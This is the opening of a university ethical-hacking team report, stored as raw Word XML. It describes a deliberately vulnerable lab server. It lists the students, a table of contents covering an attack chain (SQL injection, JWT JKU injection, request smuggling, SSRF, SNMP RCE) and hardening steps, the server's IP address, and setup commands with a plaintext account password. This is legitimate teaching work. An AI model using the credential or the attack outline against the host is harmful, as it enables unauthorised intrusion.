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 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="2645359"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="34" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:srcRect b="6902" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="264535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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ICT2212 - Ethical Hacking </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R1 Server Report</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Team 6</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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="5910.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="1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2385"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3525"/>
            <w:gridCol w:w="238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 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 Student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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> TAY HUI QUAN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 2201631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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> NG ZHENG HAO, BUDDY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 2200690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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> SOON LEUNG, ISAAC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 2200578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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> SIM JIA JIN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 2200773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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> CHUA WEN JUN, JONATHAN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 2203782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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> PEH JUN WEI, JOEL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 2203791</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="873172307"/>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jbhywsvcee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Server Details</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>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g2dp8jnhh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Setup Steps</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>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pr22p986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Configuring User Accounts</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oxzygy46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Installing Docker</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dnqs8gucc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Deploy Vulnerable Web Application</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ega1ami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Generating an SSH Private Key</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4ghdfcwf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Install and Configure Samba/CIFS File Share</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35lpum40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Install and Configure SNMP</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yaatxh5171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Exploitation</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>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43irylji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Attack Flow</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ohieuhdi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Reconnaissance</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b65onrm4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3.2.1. Nmap</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6eeunsai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3.2.2. Source Code Disclosure via OSINT</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we3bf1f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Gaining User Role Credentials</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i17gah00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3.3.1. Cross-Site WebSocket Hijacking</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ysm7kie0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Gaining Admin Role Credentials</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e761hp8m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3.4.1. Blind SQL Injection</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12pnhe6e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3.4.2. Open Redirect</w:t>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fd92z44n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3.4.3. JWT JKU injection</w:t>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my9y8or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Getting Remote Code Execution</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>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q1wn28cb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3.5.1. H2 Request smuggling using CVE 2021-36740</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>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apwjmc7v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3.5.2. Server-Side Request Forgery (SSRF)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</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bo8egje5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3.5.3. Python Prototype Pollution</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</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tjc73837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3.5.4. Unicode Normalization</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>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e8ucxjgs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3.5.5. The Final Payload</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>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47h8zib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Enumeration - Docker Mounted Share</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>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pr59esf5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Cracking Keepass Database Master Password &amp; SSH Private Key</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>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8lgnnsx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SNMP Remote Code Execution (RCE)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>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yx326lf4n4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Hardening steps</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:bCs w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">8</w:t>
          </w:r>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6cdw2ve0z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Configuring SSH</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>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tcha59mj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Update Software</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>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0t4whb0j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Block ICMP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>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4d41s7p8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Fail2ban</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>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u7hk65ir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Host-Based Firewall (UFW)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>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lfk7jg5j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SNMP Hardening</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>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i2m8kef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Samba Hardening</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>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2lhbrqqw8jn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Software Source Codes / Appendix</w:t>
              <w:tab/>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:hyperlink>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4t39xyu3i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Reference List</w:t>
              <w:tab/>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:bCs w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">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pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sjbhywsvceem" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Server Details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP Address</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">18.141.13.209</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://18.141.13.209</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Operating System</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu 20.04.6 LTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Kernel version</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.15.0-1036-aws</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1911858"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="31"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5943600" cy="191185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C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="434343"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1. Server Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2g2dp8jnhh6" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup Steps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1vpr22p986gk" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuring User Accounts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One user account will run the dockerized web application, with the following details:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="7470.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="1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560"/>
        <w:gridCol w:w="1725"/>
        <w:gridCol w:w="2445"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1740"/>
            <w:gridCol w:w="1560"/>
            <w:gridCol w:w="1725"/>
            <w:gridCol w:w="2445"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="132.97851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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> Username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color w:val="434343"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="434343"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> dev</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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserv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color w:val="434343"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="434343"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> w3bd3v3l0p3r666</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Next, add the user account using: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo useradd -m dev</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change the password of dev using: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo passwd dev</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Please set your new password and confirm it by retyping. To assist you, the prompt is provided below for your reference.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2743200" cy="50063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43200" cy="50063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0" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_25oxzygy46up" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Installing Docker</w:t>
